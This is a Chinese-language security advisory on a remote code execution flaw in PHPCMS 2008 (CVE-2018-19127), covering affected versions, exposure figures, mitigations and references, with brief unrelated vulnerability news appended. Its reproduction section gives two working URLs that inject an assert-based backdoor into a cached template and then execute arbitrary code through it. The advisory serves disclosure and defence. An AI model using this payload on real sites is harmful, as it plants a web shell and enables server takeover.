一、漏洞概述
1 简介
PHPCMS 2008[1] 是一款基于 PHP+Mysql 架构的网站内容管理系统,也是一个开 源的 PHP 开发平台。Phpcms 采用模块化方式开发,功能易用便于扩展,可面向大中型 站点提供重量级网站建设解决方案。
2018 年 11 月 09 日,安全研究员 ab1gale 在 Github 上披露 PHPCMS 2008 版本 中存在一个远程代码执行漏洞[2]。
2018 年 11 月 27 日,国家信息安全漏洞共享平台(CNVD)发布关于 PHPCMS 2008 存在代码注入漏洞的安全公告[3]。
2 影响版本
⚫ PHPCMS2008 sp4 及以下版本。
二、漏洞复现
1 复现环境
⚫ PHPCMS2008 sp4
2 复现过程及结果
1. 访问 type.php 文件,将恶意代码注入到缓存的模板文件中。
http://localhost/type.php?template=tag_(){};@unlink(FILE);assert($_GET[1]);{//../rss
2. 访问缓存的模板文件,执行代码。
http://localhost/data/cache_template/rss.tpl.php?1=phpinfo()
三、漏洞影响
根据 ZoomEye 网络空间搜索引擎对 PHPCMS 关键字的搜索结果[5],共找到 48886 条历 史记录。
四、防护方案
1、PHPCMS 2008 官方已不再维护,建议升级到 2008 以上的版本 (包括 PHPCMS V9 等)。
2、使用第三方防火墙进行防护 (如创宇盾[https://www.yunaq.com/cyd/])
3、技术业务咨询
知道创宇技术业务咨询热线:
400-060-9587(政府,国有企业)、028-68360638(互联网企业)
五、相关链接
[1] PHPCMS 官网
http://www.phpcms.cn/
[2] 漏洞详情
https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
[3] 关于 PHPCMS 2008 存在代码注入漏洞的安全公告
http://www.cnvd.org.cn/webinfo/show/4779
[4] Seebug 收录
https://www.seebug.org/vuldb/ssvid-97689
[5] ZoomEye 网络空间搜索引擎
https://www.zoomeye.org/searchResult?q=phpcm1s
2020年09月17日,IBM发布安全公告,WebSphere Application Server中存在一个安全漏洞,该漏洞是由于WebSphere Application Server在处理XML数据时容易受到XML外部实体注入(XXE)攻击。
2020年9月22日,FastAdmin远程代码执行漏洞细节曝光,黑客登录前台会员中心,即可远程GetShell,风险极大。
2020年9月17日,VMware发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中,发现了一个存在于Spring Framework中的反射型文件下载(Reflected File Download,RFD)漏洞(CVE-2020-5421)。
获取安全动态